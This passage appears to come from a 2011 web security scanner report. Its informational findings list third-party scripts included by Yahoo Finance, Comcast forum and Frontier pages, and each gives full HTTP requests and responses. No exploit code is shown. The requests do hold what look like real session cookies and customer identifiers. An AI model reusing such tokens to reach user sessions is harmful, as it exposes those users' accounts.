<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
</script>
<script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?version=2" type="text/javascript"></script>
...[SNIP]...

16.16. http://finance.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 176188

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Finance - Business Finance, Stock Market, Quotes, News</title>
<meta http
...[SNIP]...
35lww/A=3686344879798615672/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.838484?" WIDTH=120 HEIGHT=30 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3382.Yahoo/B5116950.102;abr=!ie;sz=120x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWU3ZjgxOChnaWQkRU5TOVYwUERram5wQVJwalRsLndqUU9uTWhkN2FrNW1GY1VBQ25laixzdCQxMzE1MzEzMDkzNzYzMDM1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJFpFSFVnVVBEbUxNLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDEscmQkMTZpcGRqY2tkKSk/1/*http://global.ard.yahoo.com/SIG=15eak18sq/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=ENS9V0PDkjnpARpjTl.wjQOnMhd7ak5mFcUACnej/B=ZEHUgUPDmLM-/J=1315313093838484/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=1/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1315313093.838484"></SCRIPT>
...[SNIP]...
<img src="http://ads.yimg.com/a/i/sh/bl.gif" width=1 height=1 border=0><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d847178/33/873120/randm.js"></script>
...[SNIP]...
</script>

   
<script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/connection/2.0.0/mini/connection.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/animation/2.0.0/mini/animation.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/element/2.0.0/mini/element.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/2.0.0/mini/tabview.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_fp.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_mod_tech_ticker.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbolsuggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_ie9_pinning.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yui-min-3.2.0.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_common.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfi_cookie.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs_backend.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs_frontend.js&fi/common/p/d/static/js/2.0.188908/translations/2.0.0/mini/yfs_l10n_en-US.js&fi/common/p/d/static/js/2.0.188908/streaming/2.0.0/mini/yfs_util.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js"></script>
...[SNIP]...
<![endif]-->

<script src="http://l.yimg.com/d/lib/rapid/rapid_2.1.0.js"></script>
...[SNIP]...

16.17. http://finance.yahoo.com/lookup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /lookup

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lookup?s=xss HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 64558

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Symbol Lookup from Yahoo! Finance</title>
<meta http-equiv="Content
...[SNIP]...
7912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286327912?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15u84g3hn/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903/B=l4Q4Q0PDhEw-/J=1315313286327912/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=2/X=3/*;ord=1315313286327912?"></SCRIPT>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yahoo-dom-event/2.0.0/mini/yahoo-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/element/2.0.0/mini/element-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/get/2.0.0/mini/get.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/tabview/2.0.0/mini/tabview-min.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/connection/2.0.0/mini/connection.js&fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yui-min-3.2.0.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_common.js"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js"></script>
...[SNIP]...

16.18. http://finance.yahoo.com/q  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=&t=XSS.F; expires=Fri, 03 Sep 2021 05:48:15 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>XSS.F: S
...[SNIP]...
<div id="yfi_hd"><script type='text/javascript' src='http://l.yimg.com/bm/lib/fi/common/p/d/static/js/2.0.188908/2.0.0/yui-min-3.2.0.js'></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script>
...[SNIP]...
6686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295276686?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15si3pdps/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=CoEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=2/X=3/*;ord=1315313295276686?"></SCRIPT>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&amp;fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js"></script>
...[SNIP]...
<input type="hidden" id=".yficrumb" name=".yficrumb" value=""><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfs_concat.js&amp;fi/common/p/d/static/js/2.0.188908/translations/2.0.0/mini/yfs_l10n_en-US.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie-min.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_ticker_concat.js"></script>
...[SNIP]...

16.19. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:12 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 119084
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js"> </script>
...[SNIP]...

16.20. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/780566 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; LiSESSIONID=52B4547347B0428CE9D783866B22AFED; VISITORID=2086762009; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_cc=true; s_sq=comcastsupportforumsdev%3D%2526pid%253DComcast%252520Help%252520and%252520Support%252520Forums/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/78%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:25:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 118919
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js"> </script>
...[SNIP]...

16.21. http://forums.comcast.com/t5/user/viewprofilepage/user-id/3616087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/user/viewprofilepage/user-id/3616087

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /t5/user/viewprofilepage/user-id/3616087 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; LiSESSIONID=52B4547347B0428CE9D783866B22AFED; VISITORID=2086762009; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331799|PC#1315327839174-766376.19#1316539539|check#true#1315329999; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%252C%255B'isp%252520email'%252C'1315329913981'%255D%255D%7C1473182713981%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331738091%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520customerguarantee%2520%7C1315331738106%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Disp%2520email%3B%20stc18%3Disp%2520email%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3Dcomcastsupportforumsdev%253D%252526pid%25253DComcast%25252520Help%25252520and%25252520Support%25252520Forums%25252FXfinity%25252520Central%25252FCustomer%25252520Service%25252FGamePass%25252520cancellation%25252520and%25252520e-mail%25252520response%25252520times%25252F%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%25252F%25252Fwww.comcast.com%25252FCorporate%25252FCustomers%25252FCustomerGuarantee.html%252526ot%25253DA%3B; fsr.s={"v":1,"pv":12,"lc":{"d0":{"v":12,"s":true,"e":2}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_sq=comcastsupportforumsdev%3D%2526pid%253DComcast%252520Help%252520and%252520Support%252520Forums/Xfinity%252520Central/Customer%252520Service/GamePass%252520cancellation%252520and%252520e-mail%252520response%252520times/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.comcast.com/t5/user/viewprofilepage/user-id/3616087%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:25:44 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 50199
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   <link rel="icon" href="/
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js"> </script>
...[SNIP]...

16.22. http://frontier.my.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
